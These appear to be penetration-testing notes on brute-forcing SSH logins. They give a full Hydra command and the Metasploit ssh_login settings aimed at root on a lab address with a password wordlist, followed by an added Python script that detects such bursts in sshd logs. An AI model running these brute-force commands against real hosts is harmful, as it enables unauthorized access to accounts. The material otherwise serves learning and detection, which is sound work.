Brute Force Attacks

Using Hydra:

hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.218.129:22 -t 4 -V

-l to specify the user (root)

-P to specify wordlist (wordlist path included)

ssh:// to say we’re attacking SSH, followed by the target IP and port

-t for how many parallel tasks (threads) to run (4 in this case)

-V for verbosity; seeing every single attempt happen

Using Metasploit:

use auxiliary/scanner/ssh/ssh_login

If you don’t know the module name, you can run:

search ssh

to find ssh auxiliary modules

Using the module:

set username root
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
set rhosts 192.168.218.129
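
On the target, both the Hydra run and the ssh_login module appear in the sshd log as a burst of failed password attempts for root from a single source. The following is an added example, not part of the original notes, that flags that pattern with a sliding window; the log lines, addresses, year and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample sshd log lines (documentation IP ranges, not real hosts).
SAMPLE_LOG = """\
Mar 10 14:02:01 host sshd[2211]: Failed password for root from 203.0.113.7 port 40112 ssh2
Mar 10 14:02:01 host sshd[2212]: Failed password for root from 203.0.113.7 port 40114 ssh2
Mar 10 14:02:02 host sshd[2213]: Failed password for root from 203.0.113.7 port 40116 ssh2
Mar 10 14:02:02 host sshd[2214]: Failed password for root from 203.0.113.7 port 40118 ssh2
Mar 10 14:02:04 host sshd[2215]: Failed password for root from 203.0.113.7 port 40120 ssh2
Mar 10 14:02:04 host sshd[2216]: Failed password for root from 203.0.113.7 port 40122 ssh2
Mar 10 14:03:10 host sshd[2230]: Failed password for alice from 198.51.100.20 port 51000 ssh2
Mar 10 14:03:25 host sshd[2230]: Accepted password for alice from 198.51.100.20 port 51000 ssh2
Mar 10 14:09:40 host sshd[2290]: Failed password for invalid user test from 198.51.100.20 port 51090 ssh2
"""

ASSUMED_YEAR = 2024  # syslog timestamps carry no year; assumed for parsing

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Return {source_ip: peak failures inside any window_s-second window}
    for every source that reaches the threshold."""
    recent = defaultdict(deque)  # per-source timestamps still inside the window
    flagged = {}
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue  # successful logins and unrelated lines are ignored
        ts = datetime.strptime(f"{ASSUMED_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[m["ip"]]
        q.append(ts)
        # Drop failures that have aged out of the sliding window.
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            flagged[m["ip"]] = max(flagged.get(m["ip"], 0), len(q))
    return flagged

if __name__ == "__main__":
    for ip, peak in detect_bruteforce(SAMPLE_LOG).items():
        print(f"possible SSH brute force from {ip}: {peak} failures within 60s")
```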